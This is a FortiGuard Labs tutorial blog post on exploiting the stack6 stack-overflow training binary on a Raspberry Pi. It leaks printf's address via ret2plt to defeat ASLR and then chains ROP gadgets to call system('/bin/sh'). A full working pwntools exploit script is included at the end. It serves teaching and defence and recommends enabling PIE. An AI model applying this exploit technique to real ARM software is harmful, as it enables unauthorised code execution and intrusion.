Threat Research

Tutorial of ARM Stack Overflow Exploit – Defeating ASLR with ret2plt

By Kai Lu | July 17, 2020

FortiGuard Labs Threat Research Report

The ARM architecture (a platform of RISC architectures used for computer processors) is widely used in developing IoT devices and smartphones. Understanding ARM platform exploits is crucial for developing protections against the attacks targeting ARM-powered devices. In this blog, I will present a tutorial of the ARM stack overflow exploit. The exploit target is stack6, which is a classic stack overflow vulnerability. By default, the ASLR feature is enabled on the target machine. ASLR (address space layout randomization) is a computer security technique used to prevent the exploitation of memory corruption vulnerabilities. This means that in order to complete a full exploit, an attacker first needs to defeat ASLR before performing code execution.

Exploit and Debug Environment

Raspberry PI 4B model 4GB: Raspberry Pi OS, armv7l GNU/Linux
Debugger: GDB 9.2 with GEF
Exploit Development Tool: pwntools

Quick Look

Let’s start by running the binary “stack6”. Inputting a very long text string when running stack6 could cause a segmentation fault.

Figure 1. Running the binary stack6

The first thing we want to do is determine if ASLR is running on the targeted device. We can check the status of ASLR using Raspberry PI 4B by executing the command “sysctl kernel.randomize_va_space”. A value of 2 means the ASLR feature has been enabled.

Figure2. Check the status of ASLR

Next, we use the tool checksec to figure out what security mitigations the binary takes. We can see there’s no PIE (position independent executable) on it. This makes it possible to defeat ASLR with ret2plt(return to Procedure Linkage Table).

Figure 3. Check security feature in the binary stack6 with checksec

The logic of the program is pretty straightforward. 

Figure 4. The logic of the binary stack6

Now let’s take a look at what will happen when running this binary in GDB (GNU Debugger) as follows. We set a breakpoint at the address 0x0001054c(pop  {r4, r11, pc}). Then we feed an 84-bytes string to the program. 

Figure 5. Debugging in GDB

Next, the data 0x58585858 in the stack is popped into the pc (program counter) register. From this point on, we now control the pc register. Next, let’s take a close look at how to defeat ASLR using ret2plt.

Figure 6. The controlled pc register

Defeating ASLR with ret2plt

In the prior section, we could see that there was no PIE (position-independent executable) on the binary stack6. That means that the mapping memory address of the image stack6 is fixed in the process space. This makes it possible to defeat ASLR with ret2plt. 

The binary directly uses the function printf(), so I decided to leak the address of the function printf() in libc.so. Since we have already controlled the pc register, we can utilize an ROP (return-oriented programming) chain to execute printf@PLT(printf@GOT) to leak the address of printf(). Both addresses of printf@PLT and printf@GOT are fixed due to there being no PIE in binary stack6. We then use the tool Ropper to discover two gadgets in the binary stack6 that meet our requirements. 

Figure 7. The two gadgets in the binary stack6

The addresses of printf@PLT and printf@GOT are shown as follows.

Figure 8. The addresses of printf@PLT and printf@GOT

The following is the code snippet of leaking the address of the function printf(). In the payload, it first executes printf@PLT(printf@GOT). As shown in Figure 7, it could continue to execute until the first gadget is executed once again. We next need to execute fflush@plt(0) in order to flush the output stream data. This makes sure the exploit program receives the leaking data. Once we get the leaking data, we can continue to perform the code execution. 

Figure 9. The code snippet of leaking printf() address

The following is the leaking data, including the address of the function printf() in libc.so. We can now calculate the base address of libc.so.

Figure 10. The leaking data

Code Execution Stage

In the above section, we successfully got the base address of libc.so. In this section, we will perform the code execution needed to get the shell. We can get the address of the system() call in the process space, and also find out the string “/bin/sh” in libc.so.

The payload of this stage is set up as follows:

Figure 11. The code snippet of performing code execution

As shown in Figure 9, at the end of the leaking data’s payload the program execution was forced to again jump to the entry point. This makes the program re-execute. It is at this point that we feed it the code execution payload. When it executes to the instruction “pop  {r4, r11, pc}” at the address 0x0001054c, the program jumps to the first gadget. We have crafted the data in the stack: the r3 register stores the address of the system() call and the r7 register points to the string “/bin/sh”. 

 Next, it jumps to the second gadget. It moves the value of r7 to r0. At this point, the r0 register points to the string “/bin/sh”. When it executes the instruction “blx r3”, it finally calls the function system(“/bin/sh”) to invoke a shell. 

Figure 12. Getting the shell

We run the exploit script twice, and can clearly see that the base address of libc.so varies when ASLR is on. At this point, we have completed the full exploit. 

Conclusion

In this tutorial, we presented how to exploit a classic buffer overflow vulnerability when ASLR is enabled. Because the security mitigation PIE is not enabled in the target binary, it becomes possible to defeat ASLR using ret2plt and perform the full exploit. 

Solution

If the PIE feature is added in the target binary, the above exploit will fail. We recommend that app developers enable PIE and other security mitigation features when developing apps for the ARM architecture. This way, even if a buffer overflow vulnerability exists in the app, it’s still difficult for attackers to develop a working exploit.

Exploit Script Code

from pwn import *

 

printf_plt = 0x0001035c

printf_got = 0x00020734

fflush_plt = 0x00010374

printf_offset_in_libc = 0x48430

system_offset_in_libc = 0x389c8

#0x0012bb6c   db         "/bin/sh", 0  

binsh_offset_in_libc = 0x0012bb6c

entry = 0x103b0

#start process

sh = process("./stack6")

 

payload = b''

payload += b'A'*80

 

#0x0001054c: pop {r4, r11, pc}   //controlled pc

#0x000105dc: pop {r3, r4, r5, r6, r7, r8, sb, pc}; //gadget1

#0x000105c4: mov r0, r7; mov r1, r8; mov r2, sb; blx r3; //gadget2

gadget1 = 0x000105dc

gadget2 = 0x000105c4

 

payload += p32(gadget1)

 

payload += p32(printf_plt) #r3, it stores the address of printf@plt

payload += p32(0) #r4

payload += p32(0) #r5

payload += p32(0) #r6

payload += p32(printf_got) #r7, it stores the address of printf@got, it will be passed to printf@plt as a parameter 

payload += p32(0) #r8

payload += p32(0) #sb

payload += p32(gadget2) #pc, it calls printf@plt(printf@got), leak the address of printf in libc.so

 

payload += p32(fflush_plt)  # r3, it stores the address of fflush@plt

payload += p32(0)  # r4

payload += p32(0)  # r5

payload += p32(0)  # r6

payload += p32(0)  # r7, the paramter is 0.

payload += p32(0)  # r8

payload += p32(0)  # sb

payload += p32(gadget2)  # pc, it calls fflush@plt(0)

 

payload += p32(entry)  # r3, it stores the address of the entry point

payload += p32(0)  # r4

payload += p32(0)  # r5

payload += p32(0)  # r6

payload += p32(0)  # r7

payload += p32(0)  # r8

payload += p32(0)  # sb

payload += p32(gadget2)  # pc, it jumps to the entry point again, conitnues to execute until the code execution stage is performed.

 

print("[*] The 1st stage payload: "+payload.hex())

sh.sendline(payload)

 

recvdata = sh.recv()

print("[*] recv data: {}".format(recvdata.hex()))

printf_addr = u32(recvdata[96:100])

print("[*] Got printf address: " + str(hex(printf_addr)))

print("[*] libc.so base address: " + str(hex(printf_addr-printf_offset_in_libc)))

 

libc_base = printf_addr - printf_offset_in_libc

system_addr = libc_base + system_offset_in_libc

binsh_addr = libc_base + binsh_offset_in_libc

print("[*] system address: "+ str(hex(system_addr)))

print("[*] binsh address: "+ str(hex(binsh_addr)))

 

payload =  b''

payload += b'A'*80

payload += p32(gadget1)

 

payload += p32(system_addr) #r3 points to system()

payload += p32(0) #r4

payload += p32(0) #r5

payload += p32(0) #r6

payload += p32(binsh_addr) #r7 points to "/bin/sh"

payload += p32(0) #r8

payload += p32(0) #sb

payload += p32(gadget2) #pc, it will call system("/bin/sh")

 

print("[*] The 2nd stage payload: "+payload.hex())

sh.sendline(payload)

sh.interactive()

sh.close()

Reference

https://azeria-labs.com/part-3-stack-overflow-challenges/
https://github.com/azeria-labs/ARM-challenges
https://github.com/Gallopsled/pwntools
https://github.com/hugsy/gef

Learn more about FortiGuard Labs threat research and the FortiGuard Security Subscriptions and Services portfolioSign up for the weekly Threat Brief from FortiGuard Labs. 

Learn more about Fortinet’s free cybersecurity training initiative or about the Fortinet Network Security Expert programNetwork Security Academy program, and FortiVet program.